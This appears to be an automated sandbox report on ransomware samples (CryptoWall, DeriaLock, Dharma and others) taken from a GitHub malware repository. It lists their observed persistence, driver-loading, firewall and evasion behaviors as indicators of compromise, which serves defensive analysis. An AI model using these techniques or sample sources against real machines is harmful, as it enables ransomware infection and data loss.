Resubmissions
12/05/2024, 23:12
240512-268aqsge5x 812/05/2024, 23:08
240512-24jjlage4x 1012/05/2024, 23:00
240512-2y6f6sbe99 112/05/2024, 22:56
240512-2w4jssbe92 1012/05/2024, 22:52
240512-2tg8sagd8v 1012/05/2024, 22:47
240512-2qptfsbe63 1012/05/2024, 22:41
240512-2mlydsbe49 912/05/2024, 22:39
240512-2kxxwagd41 1012/05/2024, 22:35
240512-2h1kzsgd4s 10Analysis
-
max time kernel
247s -
max time network
247s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12/05/2024, 22:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware
Resource
win10v2004-20240508-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4864 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1040 attrib.exe -
Sets service image path in registry 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\irgfxaefabktucwsw\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\irgfxaefabktucwsw.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zawybyxszrgoevc\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\zawybyxszrgoevc.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\cdjbfwrfmrdahfg\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\cdjbfwrfmrdahfg.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\rqqtiwtyllkyagj\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\rqqtiwtyllkyagj.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\owyaczjtbkajhapm\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\owyaczjtbkajhapm.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tuozouhgaaqdpu\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\tuozouhgaaqdpu.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\gpwejduszsbmkwd\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\gpwejduszsbmkwd.sys" mssql.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation Dharma.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe DeriaLock.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\logon.exe taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b227d6b7.exe explorer.exe -
Executes dropped EXE 12 IoCs
pid Process 2820 CryptoWall.exe 400 CryptoWall.exe 4492 CryptoWall.exe 1752 CryptoWall.exe 3192 DeriaLock.exe 4260 Dharma.exe 5032 Dharma.exe 4824 Dharma.exe 2268 nc123.exe 2252 mssql.exe 5080 mssql2.exe 4452 SearchHost.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*227d6b7 = "C:\\Users\\Admin\\AppData\\Roaming\\b227d6b7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b227d6b = "C:\\b227d6b7\\b227d6b7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*227d6b = "C:\\b227d6b7\\b227d6b7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b227d6b7 = "C:\\Users\\Admin\\AppData\\Roaming\\b227d6b7.exe" explorer.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: SearchHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 43 raw.githubusercontent.com 42 raw.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ip-addr.es 46 ip-addr.es 88 ip-addr.es 102 ip-addr.es -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2256 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 31 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 5c00310000000000ac58a4b51100444f574e4c4f7e310000440009000400efbea8582d61ac58a4b52e00000070e10100000001000000000000000000000000000000f81ca80044006f0077006e006c006f00610064007300000018000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5000310000000000a858f66c100041646d696e003c0009000400efbea8582d61ac5844b52e00000068e10100000001000000000000000000000000000000364baf00410064006d0069006e00000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 7800310000000000a8582d611100557365727300640009000400efbe874f7748ac5844b52e000000c70500000000010000000000000000003a00000000005423290055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders rundll32.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\NodeSlot = "3" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff explorer.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 875045.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 193565.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 515308.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 143466.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 532033.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3644 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1548 msedge.exe 1548 msedge.exe 1076 msedge.exe 1076 msedge.exe 4416 identity_helper.exe 4416 identity_helper.exe 3960 msedge.exe 3960 msedge.exe 1420 msedge.exe 1420 msedge.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 4596 msedge.exe 4596 msedge.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe 3192 DeriaLock.exe -
Suspicious behavior: LoadsDriver 32 IoCs
pid Process 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe 2252 mssql.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2820 CryptoWall.exe 5052 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2780 taskmgr.exe Token: SeSystemProfilePrivilege 2780 taskmgr.exe Token: SeCreateGlobalPrivilege 2780 taskmgr.exe Token: SeDebugPrivilege 3192 DeriaLock.exe Token: SeDebugPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeDebugPrivilege 5080 mssql2.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeLoadDriverPrivilege 2252 mssql.exe Token: SeIncreaseQuotaPrivilege 2496 WMIC.exe Token: SeSecurityPrivilege 2496 WMIC.exe Token: SeTakeOwnershipPrivilege 2496 WMIC.exe Token: SeLoadDriverPrivilege 2496 WMIC.exe Token: SeSystemProfilePrivilege 2496 WMIC.exe Token: SeSystemtimePrivilege 2496 WMIC.exe Token: SeProfSingleProcessPrivilege 2496 WMIC.exe Token: SeIncBasePriorityPrivilege 2496 WMIC.exe Token: SeCreatePagefilePrivilege 2496 WMIC.exe Token: SeBackupPrivilege 2496 WMIC.exe Token: SeRestorePrivilege 2496 WMIC.exe Token: SeShutdownPrivilege 2496 WMIC.exe Token: SeDebugPrivilege 2496 WMIC.exe Token: SeSystemEnvironmentPrivilege 2496 WMIC.exe Token: SeRemoteShutdownPrivilege 2496 WMIC.exe Token: SeUndockPrivilege 2496 WMIC.exe Token: SeManageVolumePrivilege 2496 WMIC.exe Token: 33 2496 WMIC.exe Token: 34 2496 WMIC.exe Token: 35 2496 WMIC.exe Token: 36 2496 WMIC.exe Token: SeIncreaseQuotaPrivilege 2496 WMIC.exe Token: SeSecurityPrivilege 2496 WMIC.exe Token: SeTakeOwnershipPrivilege 2496 WMIC.exe Token: SeLoadDriverPrivilege 2496 WMIC.exe Token: SeSystemProfilePrivilege 2496 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe 2780 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4892 OpenWith.exe 2252 mssql.exe 5080 mssql2.exe 3644 explorer.exe 3644 explorer.exe 4452 SearchHost.exe 2252 mssql.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1076 wrote to memory of 4660 1076 msedge.exe 81 PID 1076 wrote to memory of 4660 1076 msedge.exe 81 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 3944 1076 msedge.exe 82 PID 1076 wrote to memory of 1548 1076 msedge.exe 83 PID 1076 wrote to memory of 1548 1076 msedge.exe 83 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 PID 1076 wrote to memory of 4724 1076 msedge.exe 84 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1040 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe403346f8,0x7ffe40334708,0x7ffe403347182⤵PID:4660
-
-
